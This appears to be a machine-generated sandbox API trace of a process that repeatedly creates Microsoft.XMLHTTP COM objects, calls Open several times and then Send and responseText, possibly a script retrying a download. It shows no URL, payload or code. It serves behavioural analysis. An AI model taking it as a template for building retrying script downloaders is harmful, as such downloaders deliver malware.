	[0319.233] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0319.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0319.233] ??2@YAPEAX_K@Z () returned 0x62f330
	[0319.233] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0319.233] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0319.233] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0319.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0319.233] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0319.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0319.233] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0319.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0319.236] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0319.236] SysStringLen (param_1=0x0) returned 0x0
	[0319.236] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0319.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0319.236] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0319.236] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0319.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0319.236] ??2@YAPEAX_K@Z () returned 0x62f310
	[0319.236] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0319.236] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0319.237] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0319.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0319.237] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0319.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0319.237] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0319.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0319.237] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0319.237] SysStringLen (param_1=0x0) returned 0x0
	[0319.237] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0319.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0319.238] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0319.238] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0319.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0319.238] ??2@YAPEAX_K@Z () returned 0x62f330
	[0319.238] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0319.238] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0319.238] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0319.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0319.238] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0319.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0319.238] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0319.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0319.238] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0319.239] SysStringLen (param_1=0x0) returned 0x0
	[0319.239] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0319.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0319.239] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0319.239] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0319.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0319.239] ??2@YAPEAX_K@Z () returned 0x62f310
	[0319.239] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0319.239] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0319.239] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0319.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0319.239] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0319.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0319.239] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0319.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0319.240] longjmp () 
	[0319.240] longjmp () 
	[0319.240] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0319.240] SysStringLen (param_1=0x0) returned 0x0
	[0319.240] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0319.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0319.240] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0319.240] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0319.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0319.240] ??2@YAPEAX_K@Z () returned 0x62f330
	[0319.240] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0319.240] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0319.241] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0319.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0319.241] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0319.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0319.241] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0319.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0319.241] longjmp () 
	[0319.241] longjmp () 
	[0319.241] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0319.242] SysStringLen (param_1=0x0) returned 0x0
	[0319.242] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0319.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0319.242] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0319.242] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0319.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0319.242] ??2@YAPEAX_K@Z () returned 0x62f310
	[0319.242] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0319.242] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0319.242] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0319.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0319.242] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0319.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0319.243] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0319.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0319.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0319.243] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0319.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0320.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0320.679] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0320.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0320.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
